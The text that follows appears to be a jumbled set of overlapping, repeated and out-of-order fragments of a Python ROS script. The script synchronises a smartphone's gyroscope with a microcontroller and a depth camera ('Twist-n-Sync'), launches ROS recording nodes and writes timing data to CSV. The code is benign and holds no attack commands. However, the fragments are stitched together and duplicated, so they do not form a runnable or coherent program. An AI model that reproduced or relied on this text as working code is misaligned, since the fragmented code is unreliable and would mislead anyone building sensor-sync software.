"Start video on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9;",
"= [] depth_cam_ts = None mcu_cam_ts = None mcu_cam_ts_common = None remote =",
"= data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z])",
"# Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() #",
"\"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time -",
"subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch launched completely time.sleep(2) while True:",
"sm_remote_ts #print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print",
"mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x',",
"def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: ' + string + bcolors.ENDC)",
"mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition mcu_gyro_time = np.asarray(mcu_imu_time)",
"while True: print_master('Tap Enter to start Twist-n-Sync alignment process') input = select.select([sys.stdin], [],",
"time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape,",
"= [] for subpr in subpr_list: if subpr is not None: subpr.terminate() running_subpr_list.append(subpr)",
"'M21' : M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path,",
"), index=False) # Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess)",
"= data.header.stamp def mcu_cam_callback(data): if data.header.seq == 12: global mcu_cam_ts mcu_cam_ts = data.header.stamp",
"time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ','",
"get camrera frame data by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message to mcu.cpp",
"M[1,0], 'M11' : M[1,1], 'M12' : M[1,2], 'M20' : M[2,0], 'M21' : M[2,1],",
"data from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in",
"def signal_handler(sig, frame): print_master('Exiting') running_subpr_list = [] for subpr in subpr_list: if subpr",
"== 1: print 'Please, provide smartphone IP-address. For instance, 10.30.65.166' sys.exit() global HOST",
"rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough')",
"to avoid shaking time.sleep(1) # Gathering MCU and smartphone IMU data with ThreadPoolExecutor(max_workers=1)",
"mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command to mcu via mcu.cpp",
"'\\n' ) ''' # Added for debugging path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\"))",
": M[0,0], 'M01' : M[0,1], 'M02' : M[0,2], 'M10' : M[1,0], 'M11' :",
"= depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence: ' +",
"print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ = future.result()",
"np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0]",
"1e9 # Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time =",
"time_sync2.obtain_delay() # Check if IMU calibration and consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded",
"\", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" +",
"= subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to stop recording",
"import TimeSync2 import matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt import signal",
"2)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"): break rospy.init_node('master', anonymous=True)",
"print_master('Tap Enter to indicate the next sequence') while True: input = select.select([sys.stdin], [],",
"= sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns / 1e9 # Compute mcu desired",
"import rospy from sensor_msgs.msg import Imu, CameraInfo, TimeReference import numpy as np import",
"\"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \",",
"sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts",
"True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put",
"depth_cam_ts == None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past == 3: print('Timeout reached.",
"bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: ' + string +",
"M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ),",
"visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1),",
"#msg.time_ref = depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence: '",
"oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--')",
"None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for p in running_subpr_list] if remote is",
"in running_subpr_list] if remote is not None: try: remote.stop_video() except: pass remote.close() sys.exit()",
"ROS data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until",
"= time_sync2.time_delay M = time_sync2.M # Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time -",
"= \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start",
"'MASTER MESSAGE: ' + string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL +",
"= None def mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat",
"class bcolors: HEADER = '\\033[95m' OKBLUE = '\\033[94m' OKCYAN = '\\033[96m' OKGREEN =",
"mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem of the first measurement #",
"end_duration = 4 # Wait to avoid shaking time.sleep(1) # Gathering MCU and",
"ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started. Wait, please') future = executor.submit(remote.get_imu, 1000 *",
"please') future = executor.submit(remote.get_imu, 1000 * (start_duration + main_duration + end_duration), True, True,",
"= TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if",
"start_mcu_cam_triggering command to mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() #",
"Record data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C",
"'\\033[1m' UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: '",
"+ data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data):",
"exit_codes = [p.wait() for p in running_subpr_list] if remote is not None: try:",
"back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ = future.result() print_master('IMUs",
"mcu desired timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset ''' # Save some info",
"= TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap",
"sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close() # 2. Azure camera alignment depth_cam_listener",
"omegas to visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset,",
"sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\",",
"Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess)",
"'\\033[0m' BOLD = '\\033[1m' UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN +",
"+= 1 print_master('Current sequence: ' + str(sequence_num)) print_master('Tap Enter to indicate the next",
"# Wait until .launch launched completely time.sleep(2) while True: print_master('Tap Enter to start",
"# 2. Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\",",
"Obtain offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay()",
"axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close() # 2. Azure",
"# Send start_mcu_cam_triggering command to mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess)",
"= [] mcu_imu_data = [] depth_cam_ts = None mcu_cam_ts = None mcu_cam_ts_common =",
"Send start_mcu_cam_triggering command to mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait()",
"= '\\033[0m' BOLD = '\\033[1m' UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN",
"# Obtain offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1)",
"ENDC = '\\033[0m' BOLD = '\\033[1m' UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD +",
"depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering",
"Get data from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:,",
"smartphone remote control global remote remote = RemoteControl(HOST) # Launching ROS data collection",
"time_sleep_duration = 0.01 time_past = 0 while mcu_cam_ts == None or depth_cam_ts ==",
"/ 1e9 # Compute mcu desired timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset '''",
"latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01 time_past = 0 while",
"= None mcu_cam_ts = None mcu_cam_ts_common = None remote = None def mcu_imu_callback(data):",
"('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape,",
"imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:,",
"Some time needed to get camrera frame data by mcu.cpp time.sleep(0.1) # Send",
"\", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\")",
"M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) # Phase",
"along with everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process =",
"mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time,",
"import Imu, CameraInfo, TimeReference import numpy as np import pandas as pd from",
"remote = None def mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat)",
"'/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv(",
"# Check if IMU calibration and consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded ==",
"= '\\033[93m' FAIL = '\\033[91m' ENDC = '\\033[0m' BOLD = '\\033[1m' UNDERLINE =",
"# Register SIGINT handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list = [] for subpr",
"print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out:",
"str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed to get camrera frame data by mcu.cpp",
"plt.close() # 2. Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener =",
"launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch launched completely time.sleep(2)",
"mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition mcu_gyro_time",
"mcu_cam_callback) # Send start_mcu_cam_triggering command to mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface",
"desired timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset ''' # Save some info print",
"- mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \",",
"\", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \",",
"Ctrl+C to stop recording along with everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference,",
"mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x',",
"= 0.01 time_past = 0 while mcu_cam_ts == None or depth_cam_ts == None:",
"subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed to get",
"comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \", sm_frame_period print",
"- mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1]",
"= '\\033[94m' OKCYAN = '\\033[96m' OKGREEN = '\\033[92m' WARNING = '\\033[93m' FAIL =",
"+ ',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \\ '\\n' ) '''",
"mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) # Show mean",
"import sys import select import os HOST = None # The smartphone's IP",
"align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed to get camrera frame",
"publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording') raw_input() # Start video on s10 sm_remote_ts_ns,",
"= min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length],",
"== False or time_sync2.calibration_is_succeeded is None: print('IMU data calibration failed. Exiting') remote.close() launch_subprocess.terminate()",
"',' + str(sm_mcu_clock_offset) + \\ '\\n' ) ''' # Added for debugging path",
"3].to_numpy() / 1e9 # Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data,",
") time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU calibration and consequently TimeSync has succeeded",
"HEADER = '\\033[95m' OKBLUE = '\\033[94m' OKCYAN = '\\033[96m' OKGREEN = '\\033[92m' WARNING",
"if input: value = sys.stdin.readline().rstrip() if (value == \"\"): msg = TimeReference() #msg.header.frame_id",
"= select.select([sys.stdin], [], [], 2)[0] if input: value = sys.stdin.readline().rstrip() if (value ==",
"<reponame>MobileRoboticsSkoltech/bandeja-wrapper import time from src.RemoteControl import RemoteControl from concurrent.futures import ThreadPoolExecutor import subprocess",
"== 12: global mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def",
"' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence') while True: input",
"'\\033[93m' FAIL = '\\033[91m' ENDC = '\\033[0m' BOLD = '\\033[1m' UNDERLINE = '\\033[4m'",
"time.sleep(1) # Gathering MCU and smartphone IMU data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs",
"command to mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some",
"as mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt import signal import sys import select",
"main_duration = 4 end_duration = 4 # Wait to avoid shaking time.sleep(1) #",
"True, True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration)",
"msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence: ' + str(sequence_num)) print_master('Tap",
"with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started. Wait, please') future = executor.submit(remote.get_imu, 1000",
"UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: ' +",
"pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9",
"needed to get a camera frame and its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset",
"cam_align_subprocess.wait() # Some time needed to get a camera frame and its info",
"align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed",
"info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts global",
"MESSAGE: ' + string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER",
"mcu_imu_time = [] mcu_imu_data = [] depth_cam_ts = None mcu_cam_ts = None mcu_cam_ts_common",
"end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking')",
"time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to stop recording along with everything and exit')",
":[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' : M[0,1],",
"Some time needed to get a camera frame and its info in mcu.cpp",
"\"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts",
"+ str(sm_mcu_clock_offset) + \\ '\\n' ) ''' # Added for debugging path =",
"bcolors: HEADER = '\\033[95m' OKBLUE = '\\033[94m' OKCYAN = '\\033[96m' OKGREEN = '\\033[92m'",
"# The smartphone's IP address class bcolors: HEADER = '\\033[95m' OKBLUE = '\\033[94m'",
"start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed to get a camera frame and its",
"None remote = None def mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9",
"print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data,",
"= None remote = None def mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs /",
"mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA')",
"some info print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts",
"header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({",
"str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence: ' + str(sequence_num)) print_master('Tap Enter to",
"subpr is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for p in running_subpr_list]",
"data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started. Wait, please') future = executor.submit(remote.get_imu,",
"mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\"",
": M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv')",
"stop recording along with everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10)",
"print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with",
"msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source",
"subpr in subpr_list: if subpr is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait()",
"_, sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering finished') # Get data from mcu",
"= args[1] # Register SIGINT handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list = []",
"subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for p in running_subpr_list] if remote is not",
"Compute mcu desired timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset ''' # Save some",
"is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering finished') #",
"np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close() # 2. Azure camera alignment depth_cam_listener =",
"[] depth_cam_ts = None mcu_cam_ts = None mcu_cam_ts_common = None remote = None",
"is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for p in running_subpr_list] if",
"OKBLUE = '\\033[94m' OKCYAN = '\\033[96m' OKGREEN = '\\033[92m' WARNING = '\\033[93m' FAIL",
"== None or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past ==",
"Subtract bias in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem of",
"M[0,1], 'M02' : M[0,2], 'M10' : M[1,0], 'M11' : M[1,1], 'M12' : M[1,2],",
"TimeReference, latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01 time_past = 0",
"'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' :",
"\"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\",",
"M[0,0], 'M01' : M[0,1], 'M02' : M[0,2], 'M10' : M[1,0], 'M11' : M[1,1],",
"rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration = 1 main_duration = 4 end_duration =",
"for debugging path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t,",
"(sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) # Show mean of omegas to visually oversee",
"#rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering finished')",
"= rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command",
"signal_handler) # Starting smartphone remote control global remote remote = RemoteControl(HOST) # Launching",
"== \"\"): msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref =",
"time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering",
"= sys.stdin.readline().rstrip() if (value == \"\"): msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp",
"mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record",
"True: input = select.select([sys.stdin], [], [], 0.01)[0] if input: value = sys.stdin.readline().rstrip() if",
"running_subpr_list] if remote is not None: try: remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT,",
"mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain",
"via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed to",
"subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data record_subprocess =",
